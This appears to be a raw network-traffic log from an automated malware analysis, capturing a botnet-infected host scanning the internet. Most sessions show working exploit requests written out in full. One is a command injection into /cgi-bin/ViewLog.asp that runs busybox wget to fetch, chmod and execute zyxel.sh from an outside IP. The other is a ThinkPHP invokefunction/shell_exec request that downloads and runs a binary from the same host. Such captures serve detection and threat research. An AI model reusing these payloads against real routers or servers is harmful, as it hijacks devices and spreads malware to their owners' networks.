                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      696192.168.2.155384495.131.78.1698080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.571894884 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:29.827936888 CET363INHTTP/1.1 403 Forbidden
                                                      Server: Web server
                                                      Date: Wed, 14 Feb 2024 08:30:28 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 151
                                                      Connection: keep-alive
                                                      X-Detail: 0x1210, insufficient security level
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      697192.168.2.1560588112.121.179.13480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.619568110 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:29.935121059 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:46 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      698192.168.2.1551650119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.742831945 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:00Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      699192.168.2.153643295.216.6.2680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.841356993 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:30.063098907 CET115INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/plain; charset=utf-8
                                                      Connection: close
                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                      Data Ascii: 400 Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      700192.168.2.153966295.86.112.12080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:29.871938944 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      701192.168.2.154758095.216.249.1618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.079786062 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.224405050 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:32.568382025 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:35.416246891 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:40.792109013 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.543768883 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.071485043 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:57.077977896 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      702192.168.2.154508485.215.221.1338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.079849958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.136495113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:34.389202118 CET575INHTTP/1.1 404 Not Found
                                                      Cache-Control: must-revalidate,no-cache,no-store
                                                      Content-Type: text/html;charset=iso-8859-1
                                                      Content-Length: 382
                                                      Connection: close
                                                      Server: Jetty(9.4.45.v20220203)
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      703192.168.2.155367862.29.72.1388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.094440937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      704192.168.2.154729694.120.159.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.096225023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      705192.168.2.154746094.120.54.2518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.097987890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      706192.168.2.155145294.122.77.1928080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.098160028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      707192.168.2.153748494.123.118.2188080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.098299026 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      708192.168.2.154370862.94.231.898080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:30.099536896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      709192.168.2.1551716119.29.120.22223
                                                      TimestampBytes transferredDirectionData
